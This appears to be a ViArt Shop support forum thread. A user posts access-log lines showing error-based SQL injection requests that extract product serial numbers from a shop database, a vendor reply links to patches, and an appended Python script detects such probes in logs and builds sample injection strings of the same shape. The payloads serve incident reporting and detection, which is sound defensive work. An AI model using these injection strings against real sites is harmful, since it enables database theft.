success7777777 (Guest)
ViArt Shop hacked with similar SQL queries. How to deal with it?
 
113.22.110.170 - - [15/Jun/2013:07:19:17 +0300] "GET /products.php?category_id=0&filter=%26fl1%3D13%20and%28select%201%20from%28select%20count%28*%29%2Cconcat%28%28select%20%28selec t%20%28select%20concat%280x27%2C0x7e%2Cva_items_serials.item_id%2C0x27%2C0x7e%29%20from%20%60viarts%60.va_items_ serials%20Order%20by%20serial_number%20limit%2040%2C1%29%20%29%20from%20%60information_schema%60.tables%20limit%200%2C1%29%2Cflo or%28rand%280%29*2%29%29x%20from%20%60information_schema%60.tables%20group%20by%20x%29a%29%20and%201%3D1 HTTP/1.0" 200 9018 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
113.22.110.170 - - [15/Jun/2013:07:19:20 +0300] "GET /products.php?category_id=0&filter=%26fl1%3D13%20and%28select%201%20from%28select%20count%28*%29%2Cconcat%28%28select%20%28selec t%20%28select%20concat%280x27%2C0x7e%2Cva_items_serials.used%2C0x27%2C0x7e%29%20from%20%60viarts%60.va_items_ serials%20Order%20by%20serial_number%20limit%2040%2C1%29%20%29%20from%20%60information_schema%60.tables%20limit%200%2C1%29%2Cflo or%28rand%280%29*2%29%29x%20from%20%60information_schema%60.tables%20group%20by%20x%29a%29%20and%201%3D1 HTTP/1.0" 200 9009 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
113.22.110.170 - - [15/Jun/2013:07:19:21 +0300] "GET /products.php?category_id=0&filter=%26fl1%3D13%20and%28select%201%20from%28select%20count%28*%29%2Cconcat%28%28select%20%28selec t%20%28select%20concat%280x27%2C0x7e%2Cva_items_serials.serial_number%2C0x27%2C0x7e%29%20from%20%60viarts%60.va_items_ serials%20Order%20by%20serial_number%20limit%2041%2C1%29%20%29%20from%20%60information_schema%60.tables%20limit%200%2C1%29%2Cflo or%28rand%280%29*2%29%29x%20from%20%60information_schema%60.tables%20group%20by%20x%29a%29%20and%201%3D1 HTTP/1.0" 200 9051 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
113.22.110.170 - - [15/Jun/2013:07:19:22 +0300] "GET /products.php?category_id=0&filter=%26fl1%3D13%20and%28select%201%20from%28select%20count%28*%29%2Cconcat%28%28select%20%28selec t%20%28select%20concat%280x27%2C0x7e%2Cva_items_serials.serial_id%2C0x27%2C0x7e%29%20from%20%60viarts%60.va_items_ serials%20Order%20by%20serial_number%20limit%2041%2C1%29%20%29%20from%20%60information_schema%60.tables%20limit%200%2C1%29%2Cflo or%28rand%280%29*2%29%29x%20from%20%60information_schema%60.tables%20group%20by%20x%29a%29%20and%201%3D1 HTTP/1.0" 200 9027 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
113.22.110.170 - - [15/Jun/2013:07:19:23 +0300] "GET /products.php?category_id=0&filter=%26fl1%3D13%20and%28select%201%20from%28select%20count%28*%29%2Cconcat%28%28select%20%28selec t%20%28select%20concat%280x27%2C0x7e%2Cva_items_serials.item_id%2C0x27%2C0x7e%29%20from%20%60viarts%60.va_items_ serials%20Order%20by%20serial_number%20limit%2041%2C1%29%20%29%20from%20%60information_schema%60.tables%20limit%200%2C1%29%2Cflo or%28rand%280%29*2%29%29x%20from%20%60information_schema%60.tables%20group%20by%20x%29a%29%20and%201%3D1 HTTP/1.0" 200 9018 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
113.22.110.170 - - [15/Jun/2013:07:19:24 +0300] "GET /products.php?category_id=0&filter=%26fl1%3D13%20and%28select%201%20from%28select%20count%28*%29%2Cconcat%28%28select%20%28selec t%20%28select%20concat%280x27%2C0x7e%2Cva_items_serials.used%2C0x27%2C0x7e%29%20from%20%60viarts%60.va_items_ serials%20Order%20by%20serial_number%20limit%2041%2C1%29%20%29%20from%20%60information_schema%60.tables%20limit%200%2C1%29%2Cflo or%28rand%280%29*2%29%29x%20from%20%60information_schema%60.tables%20group%20by%20x%29a%29%20and%201%3D1 HTTP/1.0" 200 9009 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)"
 
Vito
Hello,
 
To fix DB errors which could give such requests, you need to install the following patches:
 
http://www.viart.com/downloads/filter_functions-3.6.zip - unzip and copy to includes subfolder
http://www.viart.com/downloads/block_filter-3.6.zip - unzip and copy to blocks subfolder
 
Thanks,
Vito
 
success7777777 (Guest)
Thank you Vito!
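
An added log-triage example (not part of the original thread, and not ViArt code): it scans Apache access-log lines for the error-based probing pattern shown in the first post and summarises, per client IP, which table columns and row offsets were requested, which helps scope what data to treat as exposed. The sample lines, the 203.0.113.5 and 198.51.100.7 addresses, the marker threshold and all function names are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import quote, unquote_plus

# Apache combined log format: capture the client IP and the request target.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (.*?) HTTP/[\d.]+"')
# Probing markers from the thread's logs, matched on the normalized query.
MARKERS = ("information_schema", "floor(rand(", "groupby", "concat(0x", "(select")
TARGET_RE = re.compile(r"concat\(0x27,0x7e,([a-z0-9_]+)\.([a-z0-9_]+)")
OFFSET_RE = re.compile(r"limit(\d+),1")

def normalize(url):
    """Decode the query string twice (catches double encoding) and squash it."""
    query = url.partition("?")[2]
    for _ in range(2):
        query = unquote_plus(query)
    # Lower-case and drop whitespace and backticks so spacing tricks don't matter.
    return re.sub(r"[\s`]+", "", query.lower())

def triage(lines, min_markers=3):
    """Map client IP -> hit count and {(table, column): row offsets} requested."""
    report = defaultdict(lambda: {"hits": 0, "targets": defaultdict(set)})
    for line in lines:
        m = LOG_RE.match(line)
        query = normalize(m.group(2)) if m else ""
        if sum(marker in query for marker in MARKERS) < min_markers:
            continue  # unparsable line or too few markers: not flagged
        entry = report[m.group(1)]
        entry["hits"] += 1
        target, offset = TARGET_RE.search(query), OFFSET_RE.search(query)
        if target and offset:
            entry["targets"][target.groups()].add(int(offset.group(1)))
    return report

def sample_line(ip, column, offset):
    """Constructed log line modelled on the requests quoted in the thread."""
    payload = ("&fl1=13 and(select 1 from(select count(*),concat((select "
               f"concat(0x27,0x7e,va_items_serials.{column},0x27,0x7e) from "
               f"va_items_serials limit {offset},1),floor(rand(0)*2))x from "
               "information_schema.tables group by x)a) and 1=1")
    return (f'{ip} - - [15/Jun/2013:07:19:17 +0300] "GET /products.php?category_id=0'
            f'&filter={quote(payload, safe="")} HTTP/1.0" 200 9018 "-" "-"')

# Constructed input: three probing requests and one ordinary catalogue request.
SAMPLE = [sample_line("203.0.113.5", c, o) for c, o in
          (("item_id", 40), ("used", 40), ("serial_number", 41))]
SAMPLE.append('198.51.100.7 - - [15/Jun/2013:07:20:01 +0300] '
              '"GET /products.php?category_id=3 HTTP/1.1" 200 5120 "-" "-"')

if __name__ == "__main__":
    print({ip: (e["hits"], dict(e["targets"])) for ip, e in triage(SAMPLE).items()})
```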